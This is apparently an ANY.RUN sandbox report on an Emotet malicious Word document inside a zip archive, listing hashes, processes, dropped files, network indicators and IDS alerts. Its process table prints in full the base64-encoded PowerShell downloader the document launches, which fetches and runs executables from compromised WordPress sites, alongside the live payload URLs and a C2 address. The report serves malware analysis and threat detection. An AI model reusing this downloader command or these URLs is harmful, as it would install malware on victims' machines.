analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

91001084_20201019_4708852.zip

Full analysis: https://app.any.run/tasks/68b9a4e2-92a9-4b81-9ffa-ec7b7a4d84ea
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 19, 2020, 22:40:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet-doc
emotet
Indicators:
MIME: application/zip
File info: Zip archive data, at least v5.1 to extract
MD5:

F2FF76DDE73D9E209E2800FF8BFFF4BD

SHA1:

1CD9FC5BCF4C5F24874F4B6F41FF3898C24FC112

SHA256:

38E6EAF80A392396D369FFAC9B3E98D26792A233BD0F05CD34FC826238D1B7BE

SSDEEP:

1536:j91IYi8CDaWklgxdm0xBhiscMV7l1yQFhmNfBLFF9CXxnXA5ZGtPacYzxQz:J+YADaWkaxcKBtcMJl/F6JdCXxXA/wyi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • vga.exe (PID: 3464)
      • Zb5uvjb.exe (PID: 2208)
  • SUSPICIOUS

    • Creates files in the user directory

      • POwersheLL.exe (PID: 4084)
    • Executed via WMI

      • POwersheLL.exe (PID: 4084)
      • Zb5uvjb.exe (PID: 2208)
    • PowerShell script executed

      • POwersheLL.exe (PID: 4084)
    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 4084)
      • Zb5uvjb.exe (PID: 2208)
    • Reads Internet Cache Settings

      • vga.exe (PID: 3464)
    • Starts itself from another location

      • Zb5uvjb.exe (PID: 2208)
    • Connects to server without host name

      • vga.exe (PID: 3464)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2396)
    • Manual execution by user

      • WINWORD.EXE (PID: 2396)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2396)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 51
ZipBitFlag: 0x0003
ZipCompression: Unknown (99)
ZipModifyDate: 2020:10:19 21:24:01
ZipCRC: 0xdf7e1651
ZipCompressedSize: 79732
ZipUncompressedSize: 161612
ZipFileName: 91001084_20201019_4708852.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
5
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winword.exe no specs powershell.exe zb5uvjb.exe vga.exe

Process information

PID
CMD
Path
Indicators
Parent process
2812"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\91001084_20201019_4708852.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2396"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\91001084_20201019_4708852.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4084POwersheLL -ENCOD IABTAEUAVAAtAHYAQQByAGkAQQBCAGwAZQAgACgAIgAyADYAIgArACIAOABKAHUAIgArACIANAAiACkAIAAgACgAIAAgAFsAdABZAFAAZQBdACgAJwBTAHkAJwArACcAcwBUACcAKwAnAGUAJwArACcATQAnACsAJwAuAEkATwAuAEQAaQBSAEUAYwB0ACcAKwAnAG8AcgBZACcAKQAgACAAKQAgADsAIAAgACAAJABwAEMAcQA4ADUAcwAgAD0AIAAgAFsAdABZAHAARQBdACgAJwBTAHkAcwBUAEUATQAuAE4AZQB0AC4AcwBlAFIAVgAnACsAJwBpAGMAZQAnACsAJwBQAG8AJwArACcAaQBuACcAKwAnAFQAJwArACcAbQBhAE4AYQAnACsAJwBHAEUAcgAnACkAIAAgADsAIABzAGUAVAAtAEkAVABlAE0AIAAgACgAIgBWAEEAcgBpAEEAYgBMACIAKwAiAEUAOgA5ACIAKwAiAEkAIgArACIAZAB4ACIAKwAiADMAIgApACAAKAAgACAAWwB0AFkAUABlAF0AKAAnAHMAWQAnACsAJwBTAHQAZQBNACcAKwAnAC4ATgBlAHQALgAnACsAJwBzAEUAYwBVAFIAaQBUAFkAcAAnACsAJwByAG8AdAAnACsAJwBvAGMAbwAnACsAJwBsAHQAJwArACcAeQBwAEUAJwApACAAIAApACAAOwAgACQATABzAHoAbwBhAGoAbAA9ACgAJwBNAGEAJwArACcANgBhAGgAMQAnACsAJwB5ACcAKQA7ACQATwB4AG8ANwBkADAAZwA9ACQAVABoAGcAdQBuAGQAcwAgACsAIABbAGMAaABhAHIAXQAoADgAMAAgAC0AIAAzADgAKQAgACsAIAAkAEkAMABnAHAAMAA2AGYAOwAkAEwAZABxAHYAawA0AHUAPQAoACcAUQAnACsAJwB0AHYAcQB4ADAAJwArACcAMAAnACkAOwAgACgAIABWAGEAcgBJAGEAQgBsAGUAIAAoACIAMgA2ACIAKwAiADgASgB1ACIAKwAiADQAIgApACkALgB2AEEATAB1AGUAOgA6AGMAcgBFAEEAVABFAGQAaQByAGUAYwBUAE8AUgBZACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAJwB2ACcAKwAnAFIAYQBOACcAKwAnADkAMABjACcAKwAnAHEAcgAnACsAJwBfACcAKwAnAHYAUgBhAFcAagAnACsAJwA2AGEAJwArACcAZAA2AGgAdgBSAGEAJwApACAALQBjAFIARQBQAEwAYQBDAEUAIAAgACcAdgBSAGEAJwAsAFsAYwBoAEEAcgBdADkAMgApACkAOwAkAFAAcABqADcAeQB4ADkAPQAoACcAWgAnACsAJwBkAGMAYwBjADgAcgAnACkAOwAgACAAKAAgAGcAQwBJACAAIAB2AGEAcgBJAEEAYgBsAGUAOgBwAEMAUQA4ADUAcwAgACAAKQAuAHYAQQBMAHUAZQA6ADoAUwBFAGMAVQByAEkAdABZAHAAUgBvAFQAbwBjAE8ATAAgAD0AIAAgACgAIAAgAHYAQQByAEkAYQBiAGwARQAgACgAIgA5AGkAIgArACIARABYADMAIgApACAAIAAtAHYAQQBMAHUAZQAgACAAKQA6ADoAVABMAHMAMQAyADsAJABXAGYAdgBkAGsAYwBlAD0AKAAnAFIAOQAnACsAJwA5ADYAcwBjADAAJwApADsAJABCAGwAZABiAHkANQA3ACAAPQAgACgAJwBaACcAKwAnAGIANQAnACsAJwB1AHYAagBiACcAKQA7ACQARABjAHYAaAAxAHIAZwA9ACgAJwBCADAAJwArACcAdQBzAG8ANgA3ACcAKQA7ACQASABrAGkAMgAxAGQANwA9ACgAJwBEACcAKwAnAHoAYwBiAGQAOQBiACcAKQA7ACQASwAwADIAMQBzAG0AZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBEAGcAQgBOADkAMABjACcAKwAnAHEAJwArACcAcgBfAEQAZwAnACsAJwBCAFcAJwArACcAagAnACsAJwA2AGEAZAA2AGgARAAnACsAJwBnACcAKwAnAEIAJwApAC0AcgBlAHAAbABhAEMARQAgACAAJwBEAGcAQgAnACwAWwBDAGgAYQByAF0AOQAyACkAKwAkAEIAbABkAGIAeQA1ADcAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAEMAMwAwAGgAcwA5AGoAPQAoACcAVABpACcAKwAnADQAdAAnACsAJwBzAHIAXwAnACkAOwAkAFQAcgBfAGkAMAA1AHUAPQBuAGAARQBXAC0AbwBgAEIAagBgAGUAYwB0ACAAbgBlAHQALgB3AEUAYgBDAGwASQBFAE4AVAA7ACQAUgB3AHEAMgAxAGQAawA9ACgAJwBoAHQAdABwADoALwAnACsAJwAvAGcAdQBhAHIAYQBuAHkAJwArACcALgBuAGUAJwArACcAdAAvACcAKwAnAHoAZQAnACsAJwBmAGkAcgBvACcAKwAnAC8ASwAnACsAJwAvACcAKwAnACoAaAB0AHQAJwArACcAcAA6AC8ALwB3ACcAKwAnAHcAdwAuAHkAYQBuACcAKwAnAGwAaQBwACcAKwAnAGkAbgAuACcAKwAnAG4AJwArACcAZQB0ACcAKwAnAC8AdwBwACcAKwAnAC0AYQBkAG0AJwArACcAaQBuACcAKwAnAC8AUQAnACsAJwAvACoAaAAnACsAJwB0ACcAKwAnAHQAcABzADoALwAvAGEAYQBuACcAKwAnAHMAaAB0AHIAYQB2AGUAbABzAC4AYwBvACcAKwAnAG0ALwBfAG4AbwB0AGUAcwAvAEoATABNACcAKwAnAC8AKgBoAHQAdAAnACsAJwBwAHMAOgAnACsAJwAvAC8AdABjAGEAbQBlAHgAJwArACcAcABvAC4AYwBvACcAKwAnAG0ALwB3ACcAKwAnAHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAJwArACcAbgB0AC8AYwAvACoAJwArACcAaAB0AHQAcABzACcAKwAnADoAJwArACcALwAvACcAKwAnAGUAJwArACcAYQBzAGkAJwArACcAaAAnACsAJwBhAGMAJwArACcAawBzAC4AYwBvAG0ALwB3ACcAKwAnAHAAJwArACcALQAnACsAJwBpAG4AYwBsAHUAZABlAHMALwBkAC8AKgBoAHQAdABwAHMAOgAvAC8AYwBvACcAKwAnAHMAeQAnACsAJwBzACcAKwAnAGgAZQAuAGMAbwBtACcAKwAnAC8AJwArACcAdwBwACcAKwAnAC0AaQBuAGMAbAB1AGQAZQAnACsAJwBzACcAKwAnAC8AQQAnACsAJwA0ADEALwAqACcAKwAnAGgAJwArACcAdAB0ACcAKwAnAHAAcwA6AC8ALwAnACsAJwBnAG8AbwAnACsAJwBkAHAAcgBpAGMAZQAnACsAJwBzAGgAJwArACcAbwAnACsAJwBlAHMALgBjAG8AJwArACcAbQAvAHcAcAAtAGkAJwArACcAbgBjAGwAJwArACcAdQBkAGUAcwAvACcAKwAnADAASwBvAC8AJwApAC4AcwBQAEwAaQBUACgAJABEAGwAaQBsAGIAbABjACAAKwAgACQATwB4AG8ANwBkADAAZwAgACsAIAAkAEYAeQBjAGEAcABmAHcAKQA7ACQAWQAwAG8AdwA3AHoAYQA9ACgAJwBBAGIAYQAnACsAJwBzAGsAbQAnACsAJwBwACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARwBtAGkAbwB5AHYAdwAgAGkAbgAgACQAUgB3AHEAMgAxAGQAawApAHsAdAByAHkAewAkAFQAcgBfAGkAMAA1AHUALgBkAG8AdwBOAGwAbwBBAEQAZgBJAGwARQAoACQARwBtAGkAbwB5AHYAdwAsACAAJABLADAAMgAxAHMAbQBmACkAOwAkAFMAOQA4ADQAegAxAHUAPQAoACcAUwA4AF8ANQAnACsAJwA3AGkAMwAnACkAOwBJAGYAIAAoACgAZwBFAHQAYAAtAGkAVABgAGUATQAgACQASwAwADIAMQBzAG0AZgApAC4ATABFAE4ARwB0AGgAIAAtAGcAZQAgADMAMwAyADgANgApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwArACcAaQAnACsAJwBuADMAMgBfAFAAcgBvACcAKwAnAGMAZQBzAHMAJwApACkALgBjAHIAZQBBAHQARQAoACQASwAwADIAMQBzAG0AZgApADsAJABTAHcAdQBkAG8AagByAD0AKAAnAFcAJwArACcAawBhAGwAJwArACcAdgAzADcAJwApADsAYgByAGUAYQBrADsAJABKAGwAcwBqADUAcABoAD0AKAAnAE8AOAAnACsAJwBfAHoAJwArACcAaABzADQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABLADcAdgAyADcAdgBsAD0AKAAnAEwAcwAnACsAJwA1AHEAdQAnACsAJwBzAGUAJwApAA== C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2208C:\Users\admin\N90cqr_\Wj6ad6h\Zb5uvjb.exeC:\Users\admin\N90cqr_\Wj6ad6h\Zb5uvjb.exe
wmiprvse.exe
User:
admin
Integrity Level:
MEDIUM
Description:
MFC-Anwendung Formula
Exit code:
0
Version:
1, 0, 0, 4
3464"C:\Users\admin\AppData\Local\RTLCPL\vga.exe"C:\Users\admin\AppData\Local\RTLCPL\vga.exe
Zb5uvjb.exe
User:
admin
Integrity Level:
MEDIUM
Description:
MFC-Anwendung Formula
Version:
1, 0, 0, 4
Total events
2 403
Read events
1 493
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
2396WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRFEE.tmp.cvr
MD5:
SHA256:
4084POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CRM8HGCYL8S3TQXGAF45.temp
MD5:
SHA256:
4084POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF171e75.TMPbinary
MD5:B8D28A0751A092388652CF6B1F64DABE
SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89
4084POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:B8D28A0751A092388652CF6B1F64DABE
SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89
2396WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\91001084_20201019_4708852.doc.LNKlnk
MD5:4DDD1FF70E31C6121405B73F0AEF574E
SHA256:4149E0FE5C45E636A39B6148AFE8CA7AE446A807E84CC9C1BB441192A3A3AAC9
2812WinRAR.exeC:\Users\admin\Desktop\91001084_20201019_4708852.docdocument
MD5:495018493C53C09EDD09D88F889ACC2C
SHA256:70D9F3ACCD5ADCC4408324BA6829F44ACDD7A14BD7A6EC1E403A581243E97C40
4084POwersheLL.exeC:\Users\admin\N90cqr_\Wj6ad6h\Zb5uvjb.exeexecutable
MD5:9DCF69669E2E9E643FBCD0093B0AE663
SHA256:BB6B2A315037ED908A3946B1710245F9FC09621CDF6C7235A176434B327A1C44
2208Zb5uvjb.exeC:\Users\admin\AppData\Local\RTLCPL\vga.exeexecutable
MD5:9DCF69669E2E9E643FBCD0093B0AE663
SHA256:BB6B2A315037ED908A3946B1710245F9FC09621CDF6C7235A176434B327A1C44
2396WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:7C52BD8776D723F415ECF4E99FCA775D
SHA256:F3ED8FB6EFB114FA624F7B809FF3A9642EA9680F7636C250D5B56F1425B85DAB
2396WINWORD.EXEC:\Users\admin\Desktop\~$001084_20201019_4708852.docpgc
MD5:A9A8BEBF8B9D19ECEFA6892AF2F14A23
SHA256:DBD10EB6F03A867AACEE350A2BE269C7E9D21AC84ADFC5AE98B872BEE97D69FF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4084
POwersheLL.exe
GET
177.12.163.114:80
http://guarany.net/zefiro/K/
BR
suspicious
4084
POwersheLL.exe
GET
200
182.92.169.15:80
http://www.yanlipin.net/wp-admin/Q/
CN
executable
577 Kb
suspicious
3464
vga.exe
POST
186.189.249.2:80
http://186.189.249.2/rItu0p/
AR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4084
POwersheLL.exe
182.92.169.15:80
www.yanlipin.net
Hangzhou Alibaba Advertising Co.,Ltd.
CN
suspicious
4084
POwersheLL.exe
177.12.163.114:80
guarany.net
IPV6 Internet Ltda
BR
suspicious
3464
vga.exe
186.189.249.2:80
AR
malicious

DNS requests

Domain
IP
Reputation
guarany.net
  • 177.12.163.114
suspicious
www.yanlipin.net
  • 182.92.169.15
suspicious

Threats

PID
Process
Class
Message
4084
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4084
POwersheLL.exe
A Network Trojan was detected
AV INFO Suspicious EXE download from WordPress folder
4084
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4084
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info